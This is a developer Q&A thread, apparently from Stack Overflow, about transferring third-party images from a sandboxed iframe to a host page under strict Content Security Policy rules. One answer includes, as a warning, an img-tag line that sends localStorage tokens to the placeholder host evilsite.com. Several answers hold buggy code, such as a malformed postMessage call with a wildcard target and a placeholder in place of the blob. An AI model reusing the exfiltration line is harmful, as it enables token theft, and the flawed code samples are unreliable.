Get image blob for png, jpeg, gif, and svg while respecting img-src content security policy
In my application, a user can load custom content such as a third-party hosted image. I have specific goals (for security):

Load the image in a sandboxed iframe and "transfer" the image to the "host". This allows the "host" to avoid needing to define a CSP with image-src for each possible user-uploaded image. It also allows the browser to handle things like CSP validation for the image source and then the host can trust a data URL of the image.
Keep the "host" CSP restricted to only allow iframes from our "sandbox" iframe.
Keep the "sandbox" CSP restricted for user-defined content. E.g. using img-src to only allow images from that image's host source.

In order to "transfer" the image to the host, I need a blob/data URL/object URL. I've tried the following solutions:

Use fetch() in the "sandbox" to make an HTTP request for the image URL and get the blob. This is treated as connect-src rather than img-src and "opens up" security problems.
Create an <img> with the source of the image, dynamically create a <canvas>, use canvas.getContext('2d').drawImage(img, 0, 0) (and/or related APIs), and then finally use canvas.toBlob(). This works great for JPEGs and PNGs, but only grabs the first frame for GIFs and doesn't include the raw source for an SVG.

Ideally, I'm looking for an image-oriented API (so that img-src is respected). For example:

Telling fetch() to expect an image?
Using an API like createImageBitmap() from the <img> but with all the data in the loaded image.
Using an API directly on <img> to "transfer" it to a different context (e.g. "sandbox" iframe to "host").

Is this possible?

Can you use a worker that's not governed by the same CSP?

What security problems are you worried about for using fetch/connect-src? fetch seems like it'd be the most straightforward way to do things

@jsejcksn we could, though I guess my goal is to keep the CSP :)

@Steve I guess I'm thinking of intention of image-src -- which the browser can internally manage/limit/etc. By qualifying it as an image, I don't have to worry about the implications of "what am I not considering with connect-src". Happy to be proven wrong that it's "safe" though!

^ @TheCloudlessSky There is no mechanism to violate/circumvent CSP — you're going to have to use a trusted proxy (like a worker or approved network request) in order to obtain content from a source blocked by your CSP directives.

@TheCloudlessSky, I can't say I know enough about CSPs or XSS surface areas to authoritatively say whether connect-src is less (or more) secure than image-src. I would think for anything that shouldn't run code (like images or binary data), the ultimate security lies with the browser. I was mostly curious if there were concerns that could be mitigated through validation, or if there are things I should be concerned about for my sites.

@Steve yah, I guess the mitigation-by-validation is more what I'm thinking of (e.g. getting the validation "wrong").

@TheCloudlessSky, I think you're getting downvotes because people are misreading your question as how to circumvent CSPs rather than how to define CSPs to securely load and transfer images. You might be able to clear up some confusion by explicitly saying that you are defining the policies for both the host and the sandbox and editing the title to focus on user security, but I think it's mostly due to poor reading comprehension

This feels like a situation where a backend component (eg backend for frontend, utility API or reverse proxy) can assist the browser-based app and enable an optimal solution that reduces security compromises.
EXAMPLE API-DRIVEN SOLUTION
If your app runs at https://www.example.com, it might process an image request like this, by calling a utility API that does the work of updating your web host with the real image. This should require a credential similar to that shown in the pseudocode:
POST https://api.example.com/images
Content-Type: 'application/json'
Cookie: 'auth=12345...'

{
  "src": "https://somesite.com/someimage.gif"
}

This might remove the need for iframes, and your CSP could be pretty strict. In effect it would restrict cross-site access to a particular (limited) operation:
let policy = "default-src 'none';";
policy += " script-src 'self';";
policy += " connect-src 'self' https://api.example.com;";
policy += " img-src 'self';";
policy += " style-src 'self';";
policy += " object-src 'none';";
policy += " frame-ancestors 'none';";

AVOID ALLOWING ANY HOST
Whenever possible the web host should restrict allowed remote hosts to whitelisted ones. For example, an open img-src may feel less dangerous that an open connect-src but it can have side effects. Eg if a JavaScript app stored OAuth tokens in local storage, malicious JavaScript might run code like this to exfiltrate them:
<img src=’https://evilsite.com?data=’JSON.stringify(localStorage)’ />

Often, APIs provide better security control than a CSP can. For example, you can allow any remote host, but in a more controlled way. It may not work in all deployments though, as you say in comments, since there are some locations the browser can reach but not an API.

Thanks. I'm not really sure I understand your answer... but my interpretation is that the "BFF" more-so acts like a proxy for the referenced images (e.g. similar to how GitHub proxies all user-referenced images -- via Camo: https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/about-anonymized-urls)?

Yeah - could be a reverse proxy or utility API. From a security viewpoint you avoid an open connect-src that malicious JavaScript might abuse. Instead, you only allow access to a particular secured endpoint on a host you control.

Ok, thanks for clarifying! Yes, I've considered this option but considered it out of scope from the original post because I do want to allow an end-user to reference an image from a private source. E.g. they use our SaaS app but want to reference an image on an on-premise storage which our proxy wouldn't have access to! But it's still a potential option if we want to not support that capability. FYI this is something that GitHub also documents. Thanks!

I think you are looking for post message.
https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage
this is the way you can send data between an iframe an host.
send a "retrieve image" message to the iframe. have the iframe fetch() the image blob then send the response.blob() back to the host
// send a message to the iframe to request the image
function sendMessage() {
    const message = 'retrieve image'
    const iframe = document.querySelector("iframe");
    iframe.contentWindow.postMessage(message, "*");
}

// in the iframe receive the message
window.addEventListener('message', receiveMessage, false);

// in the iframe handle featching the image and sending a message back
async function receiveMessage(event) {
  if (event.origin === 'https://allowedoroigin.com') {
     const response = await fetch("http://urlto/image.jpg");
     const imageData = await response.blob();

    const imageBlob = '[imageData]' // fetch the image and get the blob
    window.parent.postMessage(message, imageBlob);
  }
}

// back in the parent frame recieve and handle the message 
window.addEventListener('message', receiveMessage, false);

ok updated code sample: you say you just didn't know how to use fetch?
https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch
to check that the response was definately an image, you check the mime type "image/" eg:
    const reader = new FileReader();
    reader.onloadend = function() {
        const arr = (new Uint8Array(reader.result)).subarray(0, 
        4);
        let header = '';
        for (let i = 0; i < arr.length; i++) {
            header += arr[i].toString(16);
        }
        let type = '';
        switch (header) {
            case '89504e47':
                type = 'image/png';
                break;
            case 'ffd8ffe0':
            case 'ffd8ffe1':
            case 'ffd8ffe2':
            case 'ffd8ffe3':
            case 'ffd8ffe8':
                type = 'image/jpeg';
                break;
            case '47494638':
                type = 'image/gif';
                break;
            case '424d':
                type = 'image/bmp';
                break;

https://developer.mozilla.org/en-US/docs/Web/API/FileReader
idk about what the last point in your post means.
disclaimer: this is a gist not full code, you need to put the peices in the right places and handle fetching the image, use a standard fetch and run the blob() method on the result.

No, you're missing the point of the original post. The const imageBlob = '[imageData]' // fetch the image and get the blob is the detail that I need. I'm fully aware of post messaging between iframes, etc as indicated in the original post.

but not how to fetch? ok heres an updated answer

Here's what you need.
This is how I would get an image blob for different image types (PNG, JPEG, GIF, and SVG) while respecting the img-src attribute:
// Assuming you have an HTML img element with src attribute
const img = document.querySelector('img');

// Get the src attribute
const src = img.src;

// Check the type of the image
if (src.endsWith('.png')) {
// Get the PNG image blob
fetch(src)
.then(response => response.arrayBuffer())
.then(buffer => {
  const pngBlob = new Blob([buffer], { type: 'image/png' });
  console.log(pngBlob);
});
} else if (src.endsWith('.jpg') || src.endsWith('.jpeg')) {
// Get the JPEG image blob
fetch(src)
.then(response => response.arrayBuffer())
.then(buffer => {
  const jpegBlob = new Blob([buffer], { type: 'image/jpeg' });
  console.log(jpegBlob);
});
} else if (src.endsWith('.gif')) {
// Get the GIF image blob
fetch(src)
.then(response => response.arrayBuffer())
.then(buffer => {
  const gifBlob = new Blob([buffer], { type: 'image/gif' });
  console.log(gifBlob);
});
} else if (src.endsWith('.svg')) {
// Get the SVG image blob
fetch(src)
.then(response => response.text())
.then(svgString => {
  const svgBlob = new Blob([svgString], { type: 'image/svg+xml' });
  console.log(svgBlob);
});
}

I'm using the fetch API to first retrieve the image data from the img.src. Then check the extension using the endsWith() method. Based on the image type, it creates a new Blob object with the correct MIME type and logs it to the console.
Note that for SVG images, I uses response.text() instead of response.arrayBuffer() to retrieve the SVG code as a string, and then create a new Blob object with the correct MIME type.
Also, keep in mind that I assumed that the img.src attribute points to a publicly accessible URL. If the URL is not publicly accessible, you might need to use a different approach to retrieve your image data.
